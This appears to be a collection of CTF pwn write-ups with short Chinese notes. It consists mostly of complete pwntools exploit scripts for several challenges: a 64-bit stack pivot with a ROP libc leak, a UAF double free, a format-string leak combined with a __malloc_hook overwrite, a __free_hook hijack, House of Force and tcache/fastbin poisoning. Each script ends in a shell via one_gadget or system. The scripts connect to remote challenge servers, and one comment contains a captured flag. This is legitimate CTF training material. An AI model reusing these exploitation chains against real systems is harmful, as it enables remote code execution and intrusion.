1.Borrow Stack

  • 就是个64位的栈转移,前面也做过不少64位栈转移的题目了,这里就说说32位和64位的区别吧。32位下栈转移网上教程很多,无脑转就行。64位的话往main上面跳时会因为环境变量的问题而crash掉,所以一般要进行再次转移:只要栈上有大约0x200字节的空白空间,再执行system函数就不会报错。而我一般用的是one_gadget。
#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *

# Target setup: pass Q=1 on the command line to attack the remote service,
# otherwise spawn the local binary.
context.update(arch='amd64', os='linux', timeout=1)
# context.log_level='debug'

io = remote('123.56.85.29', 3635) if args.Q else process('./borrowstack')
elf = ELF('./borrowstack')

# Fixed addresses taken from the binary (0x40xxxx, i.e. assumed non-PIE);
# re-check them if the binary is rebuilt.
pop_rdi   = 0x400703            # gadget, pop rdi ; ret per its name
leave_ret = 0x400699            # leave ; ret, used for the stack pivot
bss_addr  = 0x601080            # .bss scratch area the stack is pivoted into
puts_plt  = 0x4004e0
puts_got  = elf.got['puts']
read_addr = 0x400680            # where the chain returns to for the next read

def leak():
    """Pivot the stack into .bss and leak the libc address of ``puts``.

    Two reads are answered: the first overflows the stack buffer with a
    saved rbp pointing into .bss followed by a ``leave; ret`` gadget, the
    second fills the .bss area with the ROP chain the pivot lands on
    (puts(puts@got), then back into read for the next stage).

    Returns the leaked address of ``puts`` as an int.
    """
    # Stage 1: 0x60 bytes of padding, fake rbp -> bss+0x50, then leave;ret.
    stage1 = 'a' * 0x60 + p64(bss_addr + 0x50) + p64(leave_ret)
    io.sendafter('want\n', stage1)

    # Stage 2: the chain written into .bss starting at bss+0x50 (0x6010d0).
    # After the second leave;ret the first slot is popped into rbp and
    # execution continues at the second one.
    chain = [
        p64(bss_addr),   # 0x6010d0: becomes rbp
        p64(pop_rdi),    # 0x6010d8
        p64(puts_got),   # 0x6010e0: rdi = puts@got
        p64(puts_plt),   # 0x6010e8: puts(puts@got) -> prints the libc pointer
        p64(read_addr),  # 0x6010f0: return into read for the final stage
    ]
    stage2 = 'a' * 0x50 + ''.join(chain)
    io.sendafter('now!\n', stage2)

    # puts emits the 6 significant bytes of the pointer; pad to 8 for u64.
    puts_leak = u64(io.recv(6).ljust(8, '\x00'))
    log.success('puts_leak==>{}'.format(hex(puts_leak)))
    return puts_leak
	
def pwn(leak):
    """Resolve libc from the ``puts`` leak and return into a one_gadget.

    Args:
        leak: address of ``puts`` in the target's libc (see :func:`leak`).
    """
    libc = LibcSearcher('puts', leak)
    libc_base = leak - libc.dump('puts')
    log.success('libc_base==>{}'.format(hex(libc_base)))
    # 0xf1147 is a one_gadget offset for the libc the searcher matched; it is
    # version-specific, so re-run one_gadget if a different libc is in play.
    one_gadget = libc_base + 0xf1147
    # The pending read continues at 0x6010f8: 8 bytes of filler, then the
    # slot that is popped as the return address gets the gadget.
    io.sendline('a' * 8 + p64(one_gadget))
    io.interactive()
if __name__ == '__main__':
    # Note: this rebinds the module name ``leak`` to the leaked int, exactly
    # as the original script did.
    leak = leak()
    pwn(leak)

2.Some_thing_exceting

  • 这题比较简单,漏洞是UAF,可以用double free把堆块申请到flag被读入的位置,然后show一下就行。
#!/usr/bin/python
#coding:utf-8
#flag{b3eeaf75-fea6-4b77-ae9e-6027f1a83c0a}
from pwn import *
from LibcSearcher import *
# Target setup: Q=1 on the command line selects the remote instance.
context.update(arch='amd64', os='linux', timeout=1)
context.log_level = 'debug'   # tube logging is deliberately left on here

io = remote('123.56.85.29', 6484) if args.Q else process('./excited')

def create(ba_length, ba_content, na_length, na_content):
    """Menu option 1: allocate an entry with two buffers, ``ba`` then ``na``.

    Lengths are sent as decimal strings; contents are sent raw (no trailing
    newline) so the caller controls the exact bytes written.
    """
    io.sendlineafter('do :', '1')
    parts = ((ba_length, ba_content, 'ba : '),
             (na_length, na_content, 'na : '))
    for length, content, prompt in parts:
        io.sendlineafter('length : ', str(length))
        io.sendafter(prompt, content)
def delete(ID):
    """Menu option 3: free entry ``ID`` (per the write-up the pointer is kept, giving the UAF)."""
    for prompt, data in (('do :', '3'), ('ID : ', str(ID))):
        io.sendlineafter(prompt, data)
	
def show(ID):
    """Menu option 4: print the buffers of entry ``ID``."""
    for prompt, data in (('do :', '4'), ('ID : ', str(ID))):
        io.sendlineafter(prompt, data)
	
def pwn():
    """Fastbin double free of the 0x50 buffers, then show the entry that lands on the target address.

    free(0), free(1), free(0) puts chunk 0 in the fastbin twice.  The next
    entry (2) gets chunk 0 back and writes 0x602098 into its first 8 bytes,
    i.e. the stale fd, so a later 0x50 allocation is served from
    0x602098+0x10.  Entry 3's second buffer is that allocation; showing it
    is expected to print what the binary stored there (the flag, per the
    write-up).  0x602098 is an address inside the binary — confirm it
    against the target if the binary changes.
    """
    create(0x50, 'aa', 0x50, 'aa')   # entry 0
    create(0x50, 'bb', 0x20, 'aa')   # entry 1
    for victim in (0, 1, 0):         # double free: fastbin is 0 -> 1 -> 0
        delete(victim)

    create(0x50, p64(0x602098), 0x50, 'aa')  # entry 2: reuses chunk 0, plants the fake fd
    create(0x50, ' ', 0x50, 'f')             # entry 3: chunk 0 again, then the fake chunk
    # gdb.attach(io, 'b *0x400a08')
    show(3)
    io.interactive()
if __name__ == '__main__':
    pwn()   # no leak stage needed for this target
	

3.Some_thing_exceted

  • 这题稍微比上面的难一点。有fmt漏洞可以用来泄露libc地址,然后同样利用UAF漏洞打__malloc_hook。
#!/usr/bin/python
#coding:utf-8
from pwn import *
from LibcSearcher import *
# Target setup: Q=1 on the command line selects the remote instance.
context.update(arch='amd64', os='linux', timeout=1)
# context.log_level='debug'

io = remote('123.56.85.29', 3041) if args.Q else process('./interested')
	
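def add(O_length, O_content, re_length, re_content):
    """Menu option 1: allocate an entry with an ``O`` buffer and an ``RE`` buffer.

    Fix: the original sent ``O_content`` for the RE prompt as well, so the
    ``re_content`` argument was silently ignored.  The RE buffer now
    receives the bytes the caller actually passed.

    Args:
        O_length: size requested for the O buffer (sent as decimal text).
        O_content: raw bytes written to the O buffer.
        re_length: size requested for the RE buffer.
        re_content: raw bytes written to the RE buffer.
    """
    io.sendlineafter('do :', '1')
    io.sendlineafter('length : ', str(O_length))
    io.sendafter('O : ', O_content)
    io.sendlineafter('length : ', str(re_length))
    io.sendafter('RE : ', re_content)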
def edit(ID, O_content, RE_content):
    """Menu option 2: rewrite both buffers of entry ``ID`` (the exploit relies on this working after a free)."""
    for prompt, data in (('do :', '2'), ('Oreo ID : ', str(ID))):
        io.sendlineafter(prompt, data)
    io.sendafter('O : ', O_content)
    io.sendafter('RE : ', RE_content)
def delete(ID):
    """Menu option 3: free entry ``ID``."""
    for prompt, data in (('do :', '3'), ('Oreo ID : ', str(ID))):
        io.sendlineafter(prompt, data)
def show(ID):
    """Menu option 4: print entry ``ID``."""
    for prompt, data in (('do :', '4'), ('Oreo ID : ', str(ID))):
        io.sendlineafter(prompt, data)


def format_leak(i):
    """Leak a libc address through the format-string bug in the name prompt.

    ``i`` is the positional argument printed with ``%i$p``; the caller uses
    17, which on the target is presumably a return address into
    __libc_start_main (hence the -240 adjustment below).  The fixed marker
    'OreOOrereOOreO' is echoed back in the status line and used to locate
    the printed pointer.

    Returns the computed address of __libc_start_main as an int.
    """
    marker = 'OreOOrereOOreO'
    io.sendlineafter('please:', marker + '%' + str(i) + '$p')
    io.sendlineafter('do :', '0')
    io.recvuntil('Now you are ....?\n')
    io.recvuntil('# Your Code is ' + marker)
    # 14 chars = '0x' + 12 hex digits of a 48-bit userland pointer.  240 is
    # the distance of the leaked return site from __libc_start_main in the
    # target's libc — version-specific, re-derive for another build.
    libc_start_main_leak = int(io.recv(14), 16) - 240
    log.success('libc_start_main==>{}'.format(hex(libc_start_main_leak)))
    return libc_start_main_leak
def pwn(leak):
    """Fastbin-dup a 0x60 ``O`` chunk onto __malloc_hook and fire a one_gadget.

    Args:
        leak: address of __libc_start_main in the target's libc.
    """
    libc = LibcSearcher('__libc_start_main', leak)
    libc_base = leak - libc.dump('__libc_start_main')
    one_gadget = libc_base + 0xf1147     # version-specific one_gadget offset
    malloc_hook = libc_base + libc.dump('__malloc_hook')
    # Fake chunk header 35 bytes below __malloc_hook (the usual spot whose
    # size field reads as 0x7f); its user data therefore starts at
    # malloc_hook - 19.
    fake_chunk = malloc_hook - 35
    log.success('libc_base==>{}'.format(hex(libc_base)))
    log.success('one_gadget==>{}'.format(hex(one_gadget)))
    log.success('malloc_hook==>{}'.format(hex(malloc_hook)))
    log.success('fake_chunk==>{}'.format(hex(fake_chunk)))

    add(0x60, 'a', 0x10, 'a')        # entry 1
    delete(1)                        # freed, but still editable (UAF)
    edit(1, p64(fake_chunk), ' ')    # fd of the freed chunk -> fake chunk
    add(0x60, 'a', 0x10, 'a')        # takes the real chunk; fake chunk is now next in the bin

    # The next 0x60 allocation returns malloc_hook-19, so 19 filler bytes put
    # the gadget exactly on __malloc_hook.  The following length prompt is
    # presumably what triggers the next malloc, so no RE content is sent.
    payload = 'a' * 19 + p64(one_gadget)
    # gdb.attach(io)
    io.sendlineafter('do :', '1')
    io.sendlineafter('length : ', str(0x60))
    io.sendafter('O : ', payload)
    io.sendlineafter('length : ', str(10))
    io.interactive()
	
	
if __name__ == '__main__':
    # Argument 17 was found by probing; the original notes 7 -> 's',
    # 6 -> 'start' for other offsets.
    libc_start_main_leak = format_leak(17)
    pwn(libc_start_main_leak)

4.BFnote

5.document

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
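context.update(arch='amd64', os='linux', timeout=1)
# context.log_level='debug'

# Q=1 on the command line targets the remote instance; otherwise run ./pwn locally.
if args.Q:
    io = remote('node3.buuoj.cn', 29506)
else:
    io = process('./pwn')

# Tube shorthands.  The original defined ``ru`` twice with an identical body;
# the duplicate definition is dropped.
sa = lambda a, b: io.sendafter(a, b)
sla = lambda a, b: io.sendlineafter(a, b)
ru = lambda a: io.recvuntil(a)
ia = lambda: io.interactive()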

def add(name, information, sex='w'):
    """Menu option 1: create a record.

    ``name`` is NUL-padded to 8 bytes and ``information`` to 0x70 bytes;
    ``sex`` is sent as given (default 'w').
    """
    steps = (
        (sla, 'choice :\n', '1'),
        (sa, 'name\n', name.ljust(8, '\x00')),
        (sa, 'sex\n', sex),
        (sa, 'information\n', information.ljust(0x70, '\x00')),
    )
    for send, prompt, data in steps:
        send(prompt, data)
def show(idx):
    """Menu option 2: print record ``idx``."""
    for prompt, data in (('choice :\n', '2'), ('index :\n', str(idx))):
        sla(prompt, data)
def edit(idx, information, choice='y'):
    """Menu option 3: rewrite record ``idx``.

    ``choice`` answers the "sex?" prompt (default 'y'); ``information`` is
    NUL-padded to 0x70 bytes before being sent.
    """
    for prompt, data in (('choice :\n', '3'), ('index :\n', str(idx)), ('sex?\n', choice)):
        sla(prompt, data)
    sa('information\n', information.ljust(0x70, '\x00'))
def dele(idx):
    """Menu option 4: free record ``idx``."""
    for prompt, data in (('choice :\n', '4'), ('index :\n', str(idx))):
        sla(prompt, data)
def leak():
    """Leak a libc pointer by showing a freed record.

    Two records are created; record 1 gets "/bin/sh" as its name so that
    freeing it later (with __free_hook pointing at system) runs a shell.
    Record 0 is freed and then shown: the stale chunk contents include a
    libc pointer, whose 6 low bytes are recovered by reading up to the 0x7f
    high byte.

    Returns the leaked pointer as an int.
    """
    add('caonima', information='a')       # record 0
    add('/bin/sh\x00', information='a')   # record 1
    dele(0)
    show(0)
    low6 = ru('\x7f')[-6:]
    leaked = u64(low6.ljust(8, '\x00'))
    log.success('leak==>{}'.format(hex(leaked)))
    return leaked
def pwn(leak):
    """Point __free_hook at system() and free the record whose name is "/bin/sh".

    Args:
        leak: libc pointer from :func:`leak`.  The script treats it as lying
            0x68 above __malloc_hook (consistent with an unsorted-bin fd
            into main_arena); the offset is libc-specific — verify it for
            another build.
    """
    malloc_hook = leak - 0x68
    libc = LibcSearcher('__malloc_hook', malloc_hook)
    libc_base = malloc_hook - libc.dump('__malloc_hook')
    system_addr = libc_base + libc.dump('system')
    free_hook = libc_base + libc.dump('__free_hook')
    log.success('libc_base==>{}'.format(hex(libc_base)))
    log.success('system_addr==>{}'.format(hex(system_addr)))
    log.success('free_hook==>{}'.format(hex(free_hook)))

    add('rininai', information='a')   # record 3
    add('niyede', 'a')                # record 4
    # Record 0 is still editable after its free.  The bytes written look like
    # a record/chunk layout (0x21 size field, data pointer just below
    # __free_hook, flag 1) — layout inferred from the values, confirm against
    # the binary.
    edit(0, p64(0) + p64(0x21) + p64(free_hook - 0x10) + p64(1))
    # Editing record 3 then lands system() on __free_hook.
    edit(3, p64(system_addr))
    # gdb.attach(io, 'b free')
    # pause()
    dele(1)   # free(...) -> system("/bin/sh"), per record 1's name
    ia()
	
if __name__ == '__main__':
    # Rebinds the module name ``leak`` to the leaked int, as the original did.
    leak = leak()
    pwn(leak)

6.Force

  • hof(House of Force):把top chunk的size改成-1,再用一次超大的malloc把top chunk推到__malloc_hook前面。
#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
# Target setup: Q=1 on the command line selects the remote instance.
context.update(arch='amd64', os='linux', timeout=1)
context.log_level = 'debug'   # tube logging is deliberately left on here

io = remote('node3.buuoj.cn', 26492) if args.Q else process('./gyctf_2020_force')

# Tube shorthands.
sla = lambda a, b: io.sendlineafter(a, b)
sa = lambda a, b: io.sendafter(a, b)
ia = lambda: io.interactive()
ru = lambda a: io.recvuntil(a)
rv = lambda a: io.recv(a)
def add(size, content, debug=0):
    """Menu option 1: malloc(``size``) and write ``content`` into it.

    With ``debug`` == 1 the address the target prints after "bin addr " is
    parsed and returned as an int; otherwise nothing is returned.
    """
    sla('2:puts\n', '1')
    sla('size\n', str(size))
    if debug != 1:
        sa('content\n', content)
        return None
    ru('bin addr ')
    chunk = int(rv(14), 16)   # '0x' + 12 hex digits
    log.success('leak==>{}'.format(hex(chunk)))
    sa('content\n', content)
    return chunk
def pwn():
    """House of Force: move the top chunk onto __malloc_hook and call system("/bin/sh").

    1. A 0x200000-byte request (presumably mmap'd next to libc) reveals a
       chunk address at a fixed 0x5c5b00 distance below __malloc_hook.
    2. A 0x10-byte chunk's content overflows into the top chunk header,
       setting its size to -1 so any request size is accepted.
    3. Requesting (malloc_hook - 0x10 - top) bytes leaves the top chunk
       just below __malloc_hook; the next allocation overwrites the hook
       with system().
    4. malloc(binsh_addr) then runs __malloc_hook(binsh_addr).

    All offsets are for the libc the searcher matched; re-derive them for
    another build.
    """
    leak = add(0x200000, 'a', 1)
    malloc_hook = leak + 0x5c5b00
    log.success('malloc_hook==>{}'.format(hex(malloc_hook)))

    libc = LibcSearcher('__malloc_hook', malloc_hook)
    libc_base = malloc_hook - libc.dump('__malloc_hook')
    system_addr = libc_base + libc.dump('system')
    binsh_addr = libc_base + libc.dump('str_bin_sh')
    log.success('libc_base==>{}'.format(hex(libc_base)))
    log.success('system_addr==>{}'.format(hex(system_addr)))
    log.success('binsh_addr==>{}'.format(hex(binsh_addr)))

    # 0x10 bytes fill the chunk, then prev_size = 0 and size = -1 land on the
    # top chunk header, which the original found at printed address + 0x20.
    overflow = 'a' * 0x10 + p64(0) + p64(0xffffffffffffffff)
    top_chunk = add(0x10, overflow, 1) + 0x20
    log.success('top_chunk==>{}'.format(hex(top_chunk)))

    add(malloc_hook - 0x10 - top_chunk, 'a')   # top chunk now at malloc_hook - 0x10
    add(0x20, p64(system_addr) * 4)            # served from the top: overwrites __malloc_hook
    sla('2:puts\n', '1')                       # bare malloc(binsh_addr) fires the hook
    sla('size\n', str(binsh_addr))
    ia()
if __name__ == '__main__':
    pwn()   # the leak is obtained inside pwn() for this target

7.signin

  • 高版本libc(带tcache):从fastbin中申请堆块时,若对应大小的tcache未满,会把fastbin里剩余的堆块放进tcache。
#!/usr/bin/python
#coding:utf-8
from pwn import *
# Target setup: Q=1 on the command line selects the remote instance.
context.update(arch='amd64', os='linux', timeout=1)
context.log_level = 'debug'   # tube logging is deliberately left on here

io = remote('123.56.85.29', 4205) if args.Q else process(['./pwn'])
	
	
def add(idx):
    """Menu option 1: allocate slot ``idx`` (the target fixes the size itself)."""
    for prompt, data in (('choice?', '1'), ('idx?\n', str(idx))):
        io.sendlineafter(prompt, data)
def edit(idx, content):
    """Menu option 2: write ``content`` (newline-terminated) into slot ``idx``, freed or not."""
    for prompt, data in (('choice?', '2'), ('idx?\n', str(idx))):
        io.sendlineafter(prompt, data)
    io.sendline(content)
def dele(idx):
    """Menu option 3: free slot ``idx``."""
    for prompt, data in (('choice?', '3'), ('idx?\n', str(idx))):
        io.sendlineafter(prompt, data)
def backdoor():
    """Menu option 6: the hidden entry the exploit ends with."""
    io.sendlineafter('choice?', '6')
	
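def pwn():
    """Fill the tcache, poison the leftover fastbin chunk, then call the backdoor.

    Eight same-size slots are allocated and freed; with the default tcache
    limit of 7, slot 7 ends up in the fastbin.  Its fd is then overwritten
    (the target lets freed slots be edited) with 0x4040a8, an address inside
    the binary, and one allocation plus the backdoor (menu 6) finish the
    exploit — see the write-up above for the tcache/fastbin interaction.

    Fix: the original unconditionally called ``gdb.attach``/``pause``,
    which breaks the remote run (``Q=1``); the debugger is now attached
    only for the local process.
    """
    for idx in range(8):
        add(idx)
    for idx in range(8):
        dele(idx)
    # tcache now holds 7 entries; chunk 7 sits in the fastbin.
    edit(7, p64(0x4040a8))   # poison the fastbin chunk's fd
    add(1)
    if not args.Q:           # debugger only makes sense for the local process
        gdb.attach(io)
        pause()
    backdoor()
    io.interactive()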
	

	
if __name__ == '__main__':
    pwn()   # no separate leak stage for this target